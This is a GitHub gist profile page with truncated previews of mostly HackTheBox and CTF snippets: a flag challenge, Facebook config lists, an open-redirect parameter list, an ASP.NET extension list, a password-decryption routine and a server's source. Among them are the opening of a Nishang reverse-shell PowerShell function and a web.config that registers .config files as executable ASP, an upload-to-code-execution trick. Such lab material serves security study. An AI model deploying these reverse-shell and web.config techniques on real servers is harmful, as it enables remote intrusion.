Skip to content

Instantly share code, notes, and snippets.

View ajdumanhug's full-sized avatar
🏠
Working from home

Aj Dumanhug ajdumanhug

🏠
Working from home
View GitHub Profile
@ajdumanhug
ajdumanhug / chall.py
Created January 12, 2021 15:16
solve this
important = ""
pip_important = "flag{h4ckst33tb0ys}"
import base64
randomvar = important.encode('ascii')
important_tottaly = base64.b64encode(randomvar)
import random
nothin_important = important_tottaly.decode('ascii')
pip_important = ""
supa_strong = ""
for n in nothin_important:
@ajdumanhug
ajdumanhug / cta.type
Created November 12, 2020 00:29
call_to_action[type] for Facebook Pages
BOOK_TRAVEL, CONTACT_US, DONATE, DONATE_NOW, DOWNLOAD, GET_DIRECTIONS, GO_LIVE, INTERESTED, LEARN_MORE, LIKE_PAGE, MESSAGE_PAGE, SAVE, SEND_TIP, SHOP_NOW, SIGN_UP, VIEW_INSTAGRAM_PROFILE, INSTAGRAM_MESSAGE, LOYALTY_LEARN_MORE, PURCHASE_GIFT_CARDS, PAY_TO_ACCESS, GET_MOBILE_APP, INSTALL_MOBILE_APP, USE_MOBILE_APP, INSTALL_APP, USE_APP, PLAY_GAME, WATCH_VIDEO, WATCH_MORE, OPEN_LINK, NO_BUTTON, LISTEN_MUSIC, MOBILE_DOWNLOAD, GET_OFFER, GET_OFFER_VIEW, BUY_NOW, BUY_TICKETS, UPDATE_APP, BET_NOW, ADD_TO_CART, ORDER_NOW, SELL_NOW, GET_SHOWTIMES, LISTEN_NOW, GET_EVENT_TICKETS, SEARCH_MORE, PRE_REGISTER, SWIPE_UP_PRODUCT, SWIPE_UP_SHOP, CALL, MISSED_CALL, CALL_NOW, CALL_ME, APPLY_NOW, BUY, GET_QUOTE, SUBSCRIBE, RECORD_NOW, VOTE_NOW, GIVE_FREE_RIDES, REGISTER_NOW, OPEN_MESSENGER_EXT, EVENT_RSVP, CIVIC_ACTION, SEND_INVITES, REFER_FRIENDS, REQUEST_TIME, SEE_MENU, WHATSAPP_MESSAGE, SEARCH, TRY_IT, TRY_ON, LINK_CARD, DIAL_CODE, FIND_YOUR_GROUPS
@ajdumanhug
ajdumanhug / fb.ip
Created November 10, 2020 16:00
Facebook IPs
enable_tc_mode
guest-access traffic-class internet internet
guest-access traffic-class 1 name xwf
guest-access traffic-class 1 permit *.expresswifi.com
guest-access traffic-class 1 permit xwf-static.xx.fbcdn.net
guest-access traffic-class 1 permit xwf-scontent.xx.fbcdn.net
guest-access traffic-class 1 permit xwf.facebook.com
guest-access traffic-class 1 permit *.xwf.fyi
guest-access traffic-class 1 permit h.facebook.com
guest-access traffic-class 1 permit graph.expresswifi.com
@ajdumanhug
ajdumanhug / openredirection.payloads
Created July 31, 2020 07:41
List of parameters for Open Redirection
dest
redirect
uri
path
continue
url
window
next
data
reference
@ajdumanhug
ajdumanhug / openredirection.payloads
Created July 31, 2020 07:41
List of parameters for Open Redirection
dest
redirect
uri
path
continue
url
window
next
data
reference
@ajdumanhug
ajdumanhug / shell.ps1
Created June 8, 2020 00:31
Reverse Shell using Nishang
function Invoke-PowerShellTcp
{
[CmdletBinding(DefaultParameterSetName="reverse")] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
@ajdumanhug
ajdumanhug / web.config
Created June 8, 2020 00:29
web.config with vb script
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
@ajdumanhug
ajdumanhug / extensions.ext
Last active June 10, 2023 06:08
File Types Managed by ASP.NET
asax
ascv
ashx
asmx
aspx
axd
browser
cd
compile
config
@ajdumanhug
ajdumanhug / decryptPass.vb
Last active June 5, 2020 15:25
HackTheBox's Nest VB Code to Decrypt Password
Imports System
Imports System.Text
Imports System.Security.Cryptography
Public Module Module1
Public Sub Main()
Console.WriteLine( Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) )
End Sub
Public Function Decrypt(ByVal cipherText As String, _
@ajdumanhug
ajdumanhug / SuperSecureServer.py
Created May 7, 2020 02:00
Obscurity Source Code for the Webserver
import socket
import threading
from datetime import datetime
import sys
import os
import mimetypes
import urllib.parse
import subprocess
respTemplate = """HTTP/1.1 {statusNum} {statusCode}